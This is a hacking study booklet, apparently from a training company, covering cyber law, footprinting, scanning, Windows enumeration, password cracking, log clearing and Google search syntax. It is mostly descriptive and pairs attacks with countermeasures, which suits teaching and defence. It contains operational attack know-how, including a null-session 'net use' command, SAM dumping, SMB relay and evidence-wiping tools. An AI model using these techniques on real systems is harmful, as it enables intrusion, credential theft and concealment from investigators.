Study Material by

Sponsored by

Disclaimer

Material provided here is compiled from different

sources and Technobuzz or Impeccable Trainers do

not guarantee 100% accuracy of information.

If finding something wrong then revert us on

info@technobuzz.co.in

HACKING – The Art of Exploitation

1. INTRODUCTION TO ETHICAL HACKING

Hacking is the most exhilarating game on the planet. But it stops being fun when you end up in a

cell. But hacking doesn't have to mean breaking laws.

In this we teach safe hacking so that you don't have to keep looking back over your shoulders

for narks and cops.

What we're talking about is hacking as a healthy recreation, and as a free education that can qualify

you to get a high paying job. In fact, many network systems administrators, computer scientists

and computer security experts first learned their professions, not in some college program, but from

the hacker culture. And you may be surprised to discover that ultimately the Internet is safeguarded

not by law enforcement agencies, not by giant Corporations, but by a worldwide network of, yes,

HACKERS.

You too, can become one of us.

And Hacking can be surprisingly easy.

However, before you plunge into the hacker subculture, be prepared for that hacker attitude. You

have been warned.

So...welcome to the adventure of HACKING!

WHAT DO I NEED IN ORDER TO HACK?

You may wonder whether hackers need expensive computer equipment and a shelf full of technical

manuals. The answer is NO!

Hacking can be surprisingly easy! Better yet, if you know how to search the Web, you can find

almost any computer information you need for free.

In fact, hacking is so easy that if you have an on-line service and know how

to send and read email, you can start hacking immediately.

We see many hackers making a big deal of themselves and being mysterious and refusing to help

others learn how to hack. Why? Because they don't want you to know the truth, which is that most

of what they are doing is really very simple!

Well, we thought about this. We too, could enjoy the pleasure of insulting people who ask us how

to hack. Or we could get big egos by actually teaching thousands of people how to hack.

HOW NOT TO GET BUSTED?

One slight problem with hacking is that if you step over the line, you can go to jail. We will do our

best to warn you when we describe hacks that could get you into trouble with the law. But we are

not attorneys or experts on cyber law. In addition, every state and every country has its own laws.

And these laws keep on changing. So you have to use a little sense.

But the best protection against getting busted is the Golden Rule. If you are about to do

something that you would not like to have done to you, forget it. Do hacks that make the

world a better place, or that are at least fun and harmless, and you should be able to keep out

of trouble.

ETHICS AND LEGALITIES… Nothing contained in this Cram Session is intended to teach or encourage the use of security tools or

methodologies for illegal or unethical purposes. Always act in a responsible manner. Make sure you

have written permission from the proper individuals before you use any of the tools or techniques

described in this Cram Session.

TERMINOLOGIES Exploit: According to the Jargon Dictionary, an exploit is defined as, vulnerability in software that is

used for breaking security‖. Hackers rely on exploits to gain access to, or to escalate their privileged

status on, targeted systems.

SECURITY TRIANGLE:

SOFTWARE TRIANGLE:

CONFIDENTIALITY

INTEGRITY AVAILABILITY

SECURITY

SECURITY

FUNCTIONALITY EASY TO USE

SOFTWARE

ATTACKER‘s PROCESS:

Attackers follow a fixed methodology. The steps involved in attacks are shown below:

Foot Printing

Scanning

Enumeration

Penetration-(Individuals that are unsuccessful at this step may opt for a Denial of Service

attack)

Escalation of Privilege

Cover Tracks

Backdoors

RECONNAISSANCE:

Reconnaissance is one of the most important steps of the hacking process. Before an actual

Vulnerability can be exploited it must be discovered. Discovery of potential vulnerabilities is aided

by identification of the technologies used, operating systems installed, and services/applications that

are present.

Reconnaissance can broadly be classified into two categories:

Passive Reconnaissance

Active Reconnaissance

TYPES OF ATTACKS:

There are several ways in which hackers can attack your network. No matter which path of

opportunity they choose, their goal is typically the same: control and use of your network and its

resources.

LAN Attack

WAN Attack

Physical Entry

Stolen Equipment

Unsecured Wireless Access

Dialup Attack

CATEGORIES OF EXPLOITS:

An exploit is the act of taking advantage of a known vulnerability. When ethical hackers discover

new vulnerabilities, they usually inform the product vendor before going public with their findings.

This gives the vendor some time to develop solutions before the vulnerability can be exploited.

Some of the most common types of exploits involve: Program bugs, Buffer overflows, Viruses,

Worms, Trojan Horses, Denial of Service and Social Engineering.

GOALS OF HACKER:

While the type of attack may vary, the hacker will typically follow a set methodology. This

includes:

Reconnaissance

Gaining Access

Maintaining Access

Covering Tracks

ETHICAL HACKER & CRACKER:

Historically the term HACKER was not viewed in a negative manner. It was someone that enjoys

exploring the nuances of a programs, applications and operating systems. The term CRACKER

usually refers to a ―Criminal Hacker‖. This person uses his skills for malicious intent.

Q. Who are Ethical Hackers?

Successful ethical hackers possess a variety of skills. First and foremost, they must be completely

trustworthy. Ethical hackers typically have very strong programming and computer networking

skills. They are also adept at installing and maintaining systems that use the more popular operating

systems (e.g., Linux or Windows) used on target systems. These base skills are augmented with

detailed knowledge of the hardware and software provided by the more popular computer and

networking hardware vendors.

CATEGORIES OF ETHICAL HACKER:

White Hat Hackers – perform ethical hacking to help secure companies and organizations.

Reformed Black Hat Hackers – claim to have changed their ways and that they can bring special

insight into the ethical hacking methodology.

Gray Hats-Individuals who work both offensive and defensively according to the situations.

NEED OF INFORMATION TECHNOLOGY IN WORLD:

Security compliance is must for all companies with IT backbone. The requirement is high with

organizations in IT / ITES segment. Information workers lack of basic security knowledge.

Information Security are been offered to professional in IT security

BENEFITS OF INFORMATION TECHNOLOGY:

Be an Information Security Professional. Prepare for Hacking threats of tomorrow. Secure

Desktop, LAN from crackers. Understand attacks via Virus, Worms and Trojans and preventing

them. Implement IDS. Understand Technical attacks like DDOS, SQL injections etc and take

precautions. Secure your sensitive data using cryptography and steganography. Secure your emails

and take precautions from Email attacks. Understand the various levels at which you might get

hacked. Stop Cyber Terrorism. Using Google as an aid to Information Security. Carry out cyber

Investigations and Computer Forensics. Understand Mobile Security and Related Problems. Learn

and implements Router security.

TYPES OF TESTING/EVALUATION:

Internal Evaluation

External Evaluation

Stolen Equipment Evaluations

2. CYBER ETHICS

COMPUTER CRIME:

The United States Department of Justice defines computer crime as "any violation of criminal law

that involved the knowledge of computer technology for its perpetration, investigation, or

prosecution."

VARIOUS LAWS:

Spy Act

U.S Federal Laws

United Kingdom‘s Cyber Laws

European Laws

Japan‘s Cyber Laws

Australia: The Cyber Crime Act 2001

Indian Law: The Information Technology Act

Germany‘s Cyber Law

Singapore‘s Cyber Law

Belgium Law

Brazilian Law

Canadian Law

France Law

Italian Law

―CYBER CRIME‖ is an amorphous field. It refers broadly to any criminal activity that pertains to

or is committed through the use of the Internet. A wide variety of conduct fits within this capacious

definition. We will concentrate on five activities that have been especially notorious and that have

strained especially seriously the fabric of traditional criminal law: use of the Internet to threaten or

stalk people; ONLINE FRAUD; ―HACKING‖; ONLINE DISTRIBUTION OF CHILD

PORNAGRAPHY; & CYBERTERRORISM.

CYBER STALKERS:

"Stalkers harness the tremendous power of the Web to learn about their prey and to

broadcast false information about the people they target. And the Internet - the same

tool they use to investigate and spread terror - provides stalkers with almost

impenetrable anonymity." In cyberspace, stalking and harassment may occur via e-mail

and through user participation in news groups, bulletin boards, and chat rooms. One major

difference from off-line stalking is that cyberstalkers can also dupe other Internet users into

harassing or threatening victims.

The term "CYBERSTALKING" has been coined to refer to the use of the Internet, e-mail,

or other electronic communications devices to stalk another person. Because of the

emerging nature of this form of stalking, the available evidence of cyberstalking is still

largely anecdotal, but it suggests that the majority of cyberstalkers are men and the

majority of their victims are women. As in off-line stalking, in many on-line cases, the

cyberstalker and the victim had a prior relationship, and when the victim attempts to end

the relationship, the cyberstalking begins.

IT ACT 2000(Information Technology Act-2000):

Sec -66. Hacking with computer system.

(1) Whoever with the intent to cause or knowing that he is likely to cause wrongful

loss or damage to the public or any person destroys or deletes or alters any

information residing in a computer resource or diminishes its value or utility or

affects it injuriously by any means, commits hack.

(2) Whoever commits hacking shall be punished with imprisonment up to three years,

or with fine which may extend upto two lakh rupees, or with both.

Sec-67. Publishing of information which is obscene in electronic form.

Whoever publishes or transmits or causes to be published in the electronic form, any

material which is lascivious or appeals to the prurient interest or if its effect is such as

to tend to deprave and corrupt persons who are likely, having regard to all relevant

circumstances, to read, see or hear the matter contained or embodied in it, shall be

punished on first conviction with imprisonment of either description for a term which

may extend to five years and with fine which may extend to one lac rupees and in the

event of a second or subsequent conviction with imprisonment of either description

for a term which may extend to ten years and also with fine which may extend to two

lacs rupees.

Sec-65.Tampering with computer source documents.

Whoever knowingly or intentionally conceals, destroys or alters or intentionally or

knowingly causes another to conceal, destroy or alter any computer source code used

for a computer, computer programme, computer system or computer network, when

the computer source code is required to be kept or maintained by law for the time

being in force, shall be punishable with imprisonment up to three years, or with fine

which may extend up to two lacs rupees, or with both.

Sec-43. Penalty for damage to computer, computer system, etc.

If any person without permission of the owner or any other person who is in charge of

a computer, computer system or computer network,-

(a) Accesses or secures access to such computer, computer system or computer

network;

(b) Downloads, copies or extracts any data, computer data base or information from

such computer, computer system or computer network including information or

data held or stored in any removable storage medium;

(c) Introduces or causes to be introduced any computer contaminant or computer

virus into any computer, computer system or computer network;

(d) Damages or causes to be damaged any computer, computer system or computer

network, data, computer data base or any other programs residing in such

computer, computer system or computer network;

(e) Disrupts or causes disruption of any computer, computer system or computer

network;

(f) Denies or causes the denial of access to any person authorized to access any

computer, computer system or computer network by any means;

(g) Provides any assistance to any person to facilitate access to a computer, computer

system or computer network in contravention of the provisions of this Act, rules

or regulations made there under;

(h) charges the services availed of by a person to the account of another person by

tampering with or manipulating any computer, computer system, or computer

network, he shall be liable to pay damages by way of compensation not

exceeding one crore rupees to the person so affected.

TRAFFICKING:

"Trafficking in counterfeit label for phone records, copies of computer programs or

computer program documentation or packaging, and copies of motion pictures or

other audio visual works."

Law is applicable if:

Persons knowingly traffics in a counterfeit label affixed or designed to be affixed.

Intentionally traffics a counterfeit document or packaging for a computer program.

Penalty:

Fine and Imprisonment is imposed.

3. INFORMATION GATHERING & SCANNING

FOOTPRINTING:

Footprinting is the process of gathering as much information about an organization as possible. The

objective of footprinting is to gather this information in such a way as to not alert the organization.

This information is publicly available from third parties and from organization itself.

WEB BASED TOOLS:

Many web based tools are available to help uncover domain information. This services provide

whois information, DNS information, and network queries.

Eg:

Sam Spade http://www.samspade.org

Geek Tools http://www.geektools.com

Betterwhois http://betterwhois.com

Dshield http://www.dshield.org

IANA

The Internet Assigned Number Authority is a nonprofit organization that is responsible for

preserving the central functions of the global Internet for the public good. IANA is a good starting

point for determining details about a domain. IANA lists all the top level domains of each country

and their associated technical and administrative contacts. Most of the associated domains will

allow you to search by the domain name.

RIR‘s

Regional Internet Registries are granted authority by ICANN to allocate IP address blocks within

their respective geometrical areas. These database are an excellent resource to use to further

research a domain once you have determined what area of the world it is located in.

Domain Location and Path Discovery

If you are unsure of a domain‘s location, the best way to determine its location is by use of the

traceroute command. Traceroute determines a path to a domain by incrementing the TTL field of

the IP header. When the TTL falls to zero, an ICMP message is generated. These ICMP messages

identify each particular hop on the path to the destination. There are several good GUI based

traceroute tools available. These tools draw a visual map that displays the path and destination

NeoTrace & VisualRoute are two GUI based tools that maps path and destination.

ARIN, RIPE AND Regional Databases

RIR, s is searchable by IP address. If you have the domain name, you can resolve to the IP by

pinging the domain name. RIR‘s and their area of control include:

American Registry for International Numbers(ARIN)

Reseaux IP Europeans Network Coordination(RIPE)

Asia Pacific Network Information Center(APNIC)

African Regional Internet Registry(AFRINIC)

Latin American and Caribbean Network Information Center(LACNIC)

Determining the Network Range

You can query the RIR to find out what network range the organization owns. If you chose the

wrong RIR, you will typically receive an error message that will point you to the correct record

holder.

Discovering the Organization‘s Technology

There are many ways in which individuals can passively determine the technology an organization

uses. Some examples are JOB BOARDS & GOOGLE GROUPS.

Email Tips & Tricks

The Simple Mail Transfer Protocol is used for sending Email. Every Email you receive has a

header that contains information such as the IP address of the server sending the message, the

names of any attachments included with the Email and the time and date the Email was sent and

received.

Bouncing Email

One popular technique is to send an email to an invalid email address. The sole purpose of this

activity is to examine the SMTP header that will be returned. This may reveal the Email server‘s IP

address, application type and the version. Other way to track interesting email is to use software

that will allow you to verify where the email originated and how the recipient handled it, such as

emailtraking pro and mailTracking.com.

SCANNING:

Once a hacker has moved to the scanning phase his goal will be identify active systems. There are

several ways this identification can take place. The methods of identification of active systems

include:

War Dialing

War Driving

Pinging

Port Scanning

Regardless of the method chosen the goal is still the same:

Identify that the system is live

Determine its services

Verify its OS

Pinpoint its vulnerabilities

War Dialing

While some may see war dialing as a dated art, it still has its place in the hacker‘s arsenal of tools.

If a thorough footprint has been performed, phone numbers were most likely found that can be

associated to the organization. The numbers can serve as a starting point for war dialing scans.

The hacker‘s goal will be to uncover modems that may have been left open. Administrators may

have configured these for out-of-band management. The goal of an ethical hacker is to uncover

these devices during the security audit to make sure they are removed, as modems offer a way to

bypass the corporate firewall. The tools most commonly used for war dialing include: THC-Scan,

PhoneSweep War Dialer and Telesweep.

War Driving

This mode of penetration relies on finding unsecured wireless access points. A popular tool used

for this operation is Netstumbler.

ICMP – Ping

Using the ping command is one of the easiest ways to determine if a system is reachable. Ping is

actually an ICMP(Internet Control Message Protocol) echo request-response. Its original purpose

was to provide diagnostic abilities to determine whether a network or device was reachable. The

important thing to remember about ping is that just because a system does not respond to ping, that

doesn‘t mean that it is not up. It might simply mean that ICMP type 0 and/or type 8 messages have

been blocked by the target organization. There are many tools available that can be used to

automate the ping process. These tools will typically ping sweep an entire range of addresses.

Some of these include: Pinger, Friendly Pinger, WS_Ping_Pro, NetScan Tools Pro 2000,

Hping2, and KingPing.

Detecting Ping Sweeps

Most IDS systems, such as SNORT, will detect ping sweeps. While performing a ping sweep is

not illegal, it should alert an administrator, as it is generally part of the pre-attack phase.

Port Scanning

Port scanning allows a hacker to determine what services are running on the systems that have been

identified. If vulnerable or insecure services are discovered, the hacker may be able to exploit

these to gain unauthorized access. There are a total of 65,535 * 2 ports (TCP & UDP). While a

complete scan of all these ports may not be practical, an analysis of popular ports should be

performed. Many port scanners ping first, so make sure to turn this feature off to avoid missing

systems that have blocked ICMP.Popular port scanning programs include: Nmap, Netscan Tools,

Superscan and Angry IP Scanner.

TCP Basics

As TCP is a reliable service, a 3-step startup is performed before data is transported. ACK‘s are

sent to acknowledge data transfer and a four-step shut down is completed at the end of a

communications session. TCP uses flags (Urgent, Acknowledgement, Push, Reset, Synchronize,

and Finish) to accomplish these tasks. Port scanners manipulate these flag settings to bypass

firewalls and illicit responses from targeted systems.

TCP Scan Types

Most port scanners make full TCP connections. Stealth scanners do not make full connections

and may not be detected by some IDS systems. Nmap is one of the most popular port scanners.

Some common types of ports scans are: Ping Scan, SYN Scan, Full Scan, ACK Scan and XMAS

Scan.

UDP Basics

UDP is a connectionless protocol. If ICMP has been blocked at the firewall, it can be much harder

to scan for UDP ports than TCP ports, as there may be no returned response. Just as with TCP,

hackers will look for services that can be exploited such as chargen, daytime, tftp, and echo. One

of the best UDP and TCP port scanners is Nmap.

Nmap (network mapper) is an open source port scanner that has the capability to craft

packets in many different ways. This allows the program to determine what services an OS is

running.

Port Scan Countermeasures

Practice the principle of least privilege. Don‘t leave unneeded ports open and block ICMP echo

requests at the firewall or external router. Allow traffic through the external router to only specific

hosts.

Fingerprinting

Fingerprinting is the process of determining the OS that is running on the

target system.

I. Active Stack Fingerprinting-

Active stack fingerprinting relies on subtle differences in the responses to specially

crafted packets. The most well-known program used for active stack fingerprinting is

Nmap. The –0 option is used for fingerprinting. For a reliable prediction, one open

port and one closed port is required.

II. Passive Stack Fingerprinting-

Passive fingerprinting is less reliable than active fingerprinting. Its primary advantage

is that it is stealthy. It relies on capturing packets sent from the target system.

Banner Grabbing

Banner grabbing is used to identify services. Banner grabbing works by making connections to the

various services on a host and looking at the response to hopefully determine the exact service and

version running on that port. Once these services are confirmed, this information can help to

identify possible vulnerabilities and the OS that the system is running. Netcraft, Telnet and FTP

are some of the common tools used to grab banners.

Identifying Vulnerabilities

Once a hacker has completed the scanning steps described in this section, he will attempt to

identify vulnerabilities. Vulnerabilities are typically flaws or weaknesses in the software or the

OS. Vulnerabilities lead to risk and this presents a threat to the target being scanned. Three terms

to remember include:

Vulnerability - A flaw or weakness in software.

OS Risk - The likelihood of a threat exploiting vulnerability such that a hacker will be allowed

unauthorized access or create a negative impact.

Threat - The potential for a hacker to use vulnerability.

Enumeration:

Enumeration is the process of identifying each domain that is present within the LAN. These

domains are typically identified using built-in Windows commands. The ―net command‖ is the

most widely used of these commands. Once the various domains have been identified, each host

can be further enumerated to uncover its role. Likely targets of malicious hackers include: PDC‘s,

dual homed computers, database servers, and web servers. The very act of Windows

enumeration is possible because these computers advertise themselves via browse lists. To see a

good example of this technology, take a look at Network Neighborhood on Windows systems.

These services are identifiable by the ports that can be found while performing the network scans

that were discussed in the previous section. The ports associated with these services are as follows:

135 – MS-RPC Endmapper

137 – NetBIOS Name Service

138 – NetBIOS Datagram Service

139 – NetBIOS Session Service

445 – SMB over TCP/IP (Windows 2K and above)

NetBIOS Null Sessions

Once individual computers are identified, malicious hackers will next attempt to discover the role

of the system by using NetBIOS Null Sessions. The legitimate purpose of a Null Session is to

allow unauthenticated computers to obtain browse lists from servers, allow system accounts access

to network resources, or to allow a null session pipe. A null session pipe is used when a process on

one system needs to communicate with a process on another system. Legitimate null sessions are

established over the IPC$ share.

The Inter-Process Communication Share

Windows computers communicate with each other over the IPC$ "Inter-Process

Communication" share. It is used for data sharing between applications and computers. In

Windows NT and 2000 computers, it is on by default. You can think of IPC$ as the pipeline that

facilitates file and print sharing. This is a huge vulnerability as hackers can connect to your IPC$

share using the net use command (net use \\IP\IPC$ "" /u:""). Once this connection has been

made, many types of sensitive information can be retrieved, such as user names, comments,

shares, and logon policies. What is most alarming about this vulnerability is that the attacker is

able to logon with a null username and null password.

NBTSTAT

The NBTSTAT command can be used to further identify the services that are running on a

particular system. For a listing of the type codes and their corresponding service, visit the following

link:

http://jcifs.samba.org/src/docs/nbtcodes.html

Active Directory Enumeration

To perform an Active Directory enumeration, you must have access to port 389 (LDAP Server).

You must also be able to authenticate yourself as a guest or user. Then, if these conditions are met,

enumeration of users and groups can proceed. Removing compatibility with all pre-windows 2000

computers during the installation of Active Directory can prevent this vulnerability.

Identifying Win2000 Accounts

Every object in Windows has a unique security identifier (SID). The SID is made up of two parts.

The first part identifies the domain and is unique to it. The second part is a descriptor of the

specific account. This second part is referred to as the relative identifier (RID). These follow a

specific order and are tied to unique roles within the domain. RID's are defined as follows:

Account RID

Administrator 500

Guest 501

Domain users 1000 (and up)

So, while some administrators may promote the practice ―security through obscurity‖ and rename

accounts such as administrator, the RID of the account will remain unchanged. Tools such as

USER2SID and SID2USER can be used to determine the true administrator account of the

domain.

DumpSec

DumpSec is another tool that will allow for account enumeration. Once a null session has been

established, this GUI tool will display information on users, account data, shares, and account

policies.

Null Session Countermeasures

Disable File and Print sharing. Inside network properties, under Advanced Settings, disable

NetBIOS over TCP/IP. Null sessions require access to ports 135-139 or 445. Blocking access to

these ports will also prevent these exploits. There is also a setting in Settings -> Control Panel ->

Administrative Tools –> Local Security Policy –> Local Policies –> Security Options –>

Restrict Anonymous. In Windows 2000, this registry key has three possible settings:

0 – No Restrictions

1 - Allow null sessions but disallow account enumeration

2 - No null sessions are allowed

The default setting is ―0‖. A setting of ―2‖ should be verified on a test network before use in a

production setting as some older or custom applications may not function properly with it.

Account Enumeration

Account enumeration is a further probing of accounts. Before a concerted attack can take place,

account policies and shares must be uncovered. As well, before attempting to connect to an active

account, the attacker must identify an open share to which he can connect. Also, if there is a lock

out policy in place, this must be determined. Otherwise, running tools such as NAT may result in

the lockout of all accounts. This will do the attacker little good unless he is attempting DoS. Tools

such as Enum, User Info, GetAcct, and SNMPUtil can be used to accomplish this task.

SNMP Enumeration

SNMP (Simple Network Management Protocol) is a network management standard widely used

within TCP/IP networks. It provides a means of managing routers, switches, and servers from

a central location. It works through a system of agents and managers. SNMP provides only

limited security through the use of community strings. The defaults are ―public‖ and ―private‖

and are transmitted over the network in clear text. Devices that are SNMP enabled, share a lot

of information about each device that probably should not be shared with unauthorized parties.

Hence consider changing the default passwords‘ community strings.

SNMPUtil is a Windows enumeration tool that can be used to query computers running

SNMP.

IP Network Browser

SolarWinds IP Network Browser is a GUI based network discovery tool. It allows you to scan a

detailed discovery on one device or an entire subnet.

SNMP Enumeration Countermeasures

As with all other services, the principle of least privilege should also be followed here. If you don‘t

need SNMP, turn it off. You should always seek to remove or disable all unnecessary services. If

you must use SNMP, change the default community strings and block port 161 at key points

throughout the network.

4. WINDOWS HACKING & SYSTEM ATTACKS

System/Windows hacking is the point at which the line is crossed and an actual connection is made.

It is the first true attack phase as the attacker is actually breaking and entering. This may be

achieved by an administrative connection or an enumerated share.

Identifying Shares

One of the easiest ways to enumerate shares is with the net view command. This will identify all

public shares. Hidden shares, those followed by a ―$‖ will not be displayed. Common hidden

shares include: IPC$, C$, D$ and Admin$ There are several GUI tools that can be used to identify

non-hidden and hidden shares, such as, DumpSec and Legion.

Password Guessing

Many times, password guessing is successful because people like to use easy to remember words

and phrases. A diligent attacker will look for subtle clues throughout the enumeration process to

key in on probable words or phrases the account holder may have used for a password. Accounts

that will be focused on for possible attack include:

Accounts that haven‘t changed passwords

Service accounts

Shared accounts

Accounts that indicate the user has never logged in

Accounts that have information in the comment field that may compromise password

security

Manual Password Guessing

Assuming that a vulnerable account has been identified, the most common method of attack is

manual password guessing. The net use command can be issued from the command line to

attempt the connection.

Performing Automated Password Guessing

If manual password cracking was unsuccessful, attackers will most likely turn to automated tools.

Most automated password guessing tools use dictionaries to try to crack accounts. These attacks

can be automated from the command line by using the ―FOR‖ command or they can also be

attempted by using tools such as NAT or ENUM. To use NAT, two files would first need to be

created. The first would contain a list of possible user names, while the second would comprise a

dictionary file. Each user name would be attempted with every word in the dictionary until a match

was achieved or all possibilities were exhausted.

Password Guessing Countermeasures

Password guessing is made much more difficult when administrators use strict password policies.

These policies should specify passwords that:

Are complex

Contain upper case and lower case letters

Use numbers, letters, and special characters

It is not uncommon to hear individuals talk about pass-phrases; this concept helps users realize that

common words are not robust passwords. Another excellent password guessing countermeasure is

to simply move away from passwords completely. Of the three types of authentication (see below),

passwords are the weakest:

Something You Know - Passwords

Something You Have - Smart Cards

Something You Are – Biometrics

Monitoring Event Viewer Logs

No matter which form of authentication you choose, policies should be in place that require the

regular review of event logs. Attacks cannot be detected if no one is monitoring activity. Luckily,

there are tools to ease the burden of log file review and management. VisualLast is a tool that

makes it easy to assess the monitor log activity and has a number of sophisticated features.

Sniffing Passwords

Windows uses a challenge / response authentication method that is based on the NTLM

protocol. The protocol requires a client to contact a server for domain authentication and a hash is

passed. NTLM also functions in a peer-to-peer network. Through the years, NTLM has evolved.

The three basic forms of NTLM are listed below:

LAN Manager – Insecure, used for Windows 3.11, 95, and 98 computers

NTLM V1 – Used for Windows NT Service Pack 3 or earlier

NTLM V2 – A more secure version of challenge response protocol used by Windows 2000

and XP

One problem with NTLM is that it is backwards compatible by default. This means if the network

contains Windows 95/98 computers, the protocol will step down to the weaker form of

authentication to try to allow authentication. This can be a big security risk. It is advisable to

disable this by making a change to the Local Policies Security Options template. Another

problem with NTLM is that tools have been developed that can extract the passwords from the

logon exchange. One such set of tools is ScoopLM and BeatLM from

http://www.securityfriday.com ; another is L0phtCrack. NTLM is not the only protocol that might

be sniffed on an active network. Tools also exist to capture and crack Kerberos authentication.

The Kerberos protocol was developed to provide a secure means for mutual authentication

between a client and a server. Kerberos is found in large complex network environments. One of

the tools that might be used to attempt to defeat this protocol is KerbCrack.

Privilege Escalation

If by this point the attacker has compromised an account, but not one of administrator status, the

amount of damage he can do is limited. To be in full control of the system, the attacker needs

administrator status. This is achieved through privilege escalation. What makes this most

difficult is that these exploits must typically be run on the system under attack. Three ways this

may be achieved:

Trick the user into executing a particular program.

Copy the privilege escalation program to the system and schedule it to run at a

predetermined time

Gain interactive access to the system.

Retrieving the SAM File

One of the first activities that an attacker will usually attempt after gaining administrative access is

that of stealing the SAM (Security Account Manager) file. The SAM contains the user account

passwords stored in their hashed form. Microsoft raised the bar with the release of NT service

pack 3. Products newer than this release contain a second layer of encryption called the SYSKEY.

Even if an attacker obtains the SYSKEY hash, he must still defeat its 128-bit encryption. Todd

Sabin found a way around this through the process of DLL injection and created a tool called

Pwdump. This tool allows the attacker to hijack a privileged process and bypass SYSKEY

encryption. Pwdump requires administrative access.

Cracking Windows Passwords

Once the passwords have been stolen, they will need to be cracked. This can be accomplished by

using a password-cracking program. Password cracking programs can mount several different

types of attacks. These include:

Dictionary Attack

Hybrid Attack

Brute Force Attack.

Windows Password Insecurities

One of the big insecurities of Windows passwords is that if the WIN2K domain is set up to be

backwards compatible, the passwords are 14 characters or less. This version of the hash is

known as the LanManager (LANMAN) Hash. What makes LANMAN quickly crackable is that

while the password can be up to 14 characters, the passwords are actually divided into two 7

character fields. Thus, cracking can proceed simultaneously against each 7-character field.

Several tools are available to exploit this weakness, including, L0phtCrack and John the Ripper.

Password Cracking Countermeasures

The domain password policy should be configured to restrict users from using the same password

more than once or at least configured where eight to ten new passwords must be used before an

individual can reuse an old password again. This policy can be enforced through the local / domain

security policy. Passwords:

Should be at least 7 or 14 characters long

Should be upper and lower case

Should be numbers, letters, and special characters (*! &@#%$)

Should have a maximum life of no more than 30-days

Another countermeasure to password cracking is to use one-time passwords. There are several

different one-time password schemes available. The most widely used replacement is the smart

cards; SecurID is a popular choice.

SMB Redirection

An SMB (Server Message Block) redirect attack may be attempted by tricking a user to

authenticate to a bogus SMB server. This allows the attacker to capture the victim‘s hashed

credentials. This may be attempted by tricking the user to click on a link embedded in an e-mail.

Users should always use caution when clicking on e-Mail links. Several tools are available to help

attackers pull off this hack. One of these tools is SMBRelay, a fraudulent SMB server used to

capture usernames and passwords.

Physical Access

If an attacker can gain physical access to your facility or equipment, he‘ll own it. Without

physical access control, all administrative and technical barriers can typically be overcome. This

holds true for any piece of equipment. Even routers are not immune. Cisco‘s website details how

to reset passwords if you have physical access. http://www.cisco.com/warp/public/474/

Many programs are available that can be used to bypass NTFS security or to reset the

administrator password. Some of the programs are: Offline NT Password Resetter, NTFSDOS

and LinNT.

Keystroke Logging

Keystroke loggers can be hardware or software based. These programs will log and capture all

the keystrokes a user types. Some of these programs, such as eBlaster, will even secretly e-mail

the captured keystrokes to a predetermined e-mail account.

Keystroke Loggers (or Keyloggers) intercept the Target‘s keystrokes and either saves them in a

file to be read later, or transmit them to a predetermined destination accessible to the Hacker.

Since Keystroke logging programs record every keystroke typed in via the keyboard, they can

capture a wide variety of confidential information, including passwords, credit card numbers,

and private Email correspondence, names, addresses, and phone numbers.

Some Famous Keyloggers

Actual Spy

Perfect Keylogger

Family Keylogger

Home Keylogger

Soft Central Keylogger

Adramax Keylogger

Rootkits

Rootkits are malicious code that is developed for the specific purpose of allowing hackers to gain

expanded access to a system and hide their presence. While rootkits have been available in the

Linux world for many years, they are now starting to make their way into the Windows

environment. Rootkits are considered freeware and are readily available on the Internet. If you

suspect a computer has been rootkitted, you‘ll need to use an MD5 checksum utility or a program

such as Tripwire to determine the viability of your programs. The only other alternative is to

rebuild the computer from known good media.

Evidence Hiding

Once an attacker has gained full control of the victim‘s computer, he will typically try to cover his

tracks. According to Locard's Exchange Principle, ―whenever someone comes in contact with

another person, place, or thing, something of that person is left behind.‖ This means the

attacker must clear log files, eliminate evidence, and cover his tracks. A common tool the

attacker will use to disable logging is the auditpol command. The attacker will also attempt to

clear the log. This may be accomplished with the Elsave command. This will remove all entries

from the logs, except one showing the logs were cleared. Other tools an attacker may attempt to

use at this point include Winzapper and Evidence Eliminator.

File Hiding

Various techniques are used by attackers in an attempt to hide their tools on the compromised

computer. Some attackers may just attempt to use attrib to hide files, while others may place their

warez in low traffic areas; e.g., winnt/system32/os2drivers. One of the most advanced file

hiding techniques is NTFS File Streaming. A tool that is available to detect streamed files is Sfind.

Data Hiding

Other data hiding techniques deal with moving information in and out of networks undetected. This

can be accomplished through the use of bitmaps, MP3 files, Whitespace hiding, and others. Each

is briefly described below:

Steganography- The art of hiding text inside of images

ImageHide – A Stego program

MP3Stego – A Stego program that hides text in MP3 files

Snow – A Stego program that hides text in the whitespace inside of documents

Camera/Shy – Used to hide text in web based images

While there are tools such as StegDetect that can sometimes find these files, that by no way means

you will be able to break their encryption and uncover the contents.

Prompting the Box

The final step for the attacker is that of becoming the target. Up to this point, the attacker has been

able to maintain a connection to the target, but may not yet have the ability to execute and run

programs locally. The following three tools will allow the attacker to become the target: Psexec,

Remoxec, and Netcat. When the attacker has a command prompt on the victim‘s computer, he will

typically restart the methodology looking for other internal targets to attack and compromise.

5. GOOGLING/GOOGLE HACKING

Google Searching Basics:

Building Google Queries:

Google query building is a process. There‘s really no such thing as an incorrect search. It‘s

entirely possible to create an ineffective search, but with the explosive growth of the Internet and

the size of Google‘s cache, a query that‘s inefficient today may just provide good results

tomorrow—or next month or next year. The idea behind effective Google searching is to get a

firm grasp on the basic syntax and then to get a good grasp of effective narrowing techniques.

Learning the Google query syntax is the easy part. Learning to effectively narrow searches can take

quite a bit of time and requires a bit of practice. Eventually, you‘ll get a feel for it, and it will

become second nature to find the needle in the haystack.

Golden Rules of Google Searching:

1. Google queries are not case sensitive.

Google doesn‘t care if you type your query in lowercase letters (hackers), uppercase

(HACKERS), camel case (hAcKeR), or psycho-case (haCKeR)—the word is always

regarded the same way.

2. Google wildcards

Google‘s concept of wildcards is not the same as a programmer‘s concept of wildcards.

Most consider wildcards to be either a symbolic representation of any single letter (UNIX

fans may think of the question mark) or any series of letters represented by an asterisk.

This type of technique is called stemming. Google‘s wildcard, the asterisk (*), represents

nothing more than a single word in a search phrase. Using an asterisk at the beginning or

end of a word will not provide you any more hits than using the word by itself.

3. Google stems automatically.

Google will stem, or expand, words automatically when it‘s appropriate. For example,

consider a search for pet lemur dietary needs, as shown in Figure 1.12. Google will return

a hit that includes the word lemur along with pet and, surprisingly, the word diet, which

is short for dietary. Keep in mind that this automatic stemming feature can provide you

with unpredictable results.

4. Google reserves the right to ignore you

Google ignores certain common words, characters, and single digits in a search. These

are sometimes called stop words. When Google ignores any of your search terms, you

will be notified on the results page, just below the query box, as shown in Figure 1.13.

Some common stop words include who, where, what, the, a, or an. Curiously enough, the

logic for word exclusion can vary from search to search.

5. Ten-word limit

Google limits searches to 10 terms. This includes search terms as well as advanced

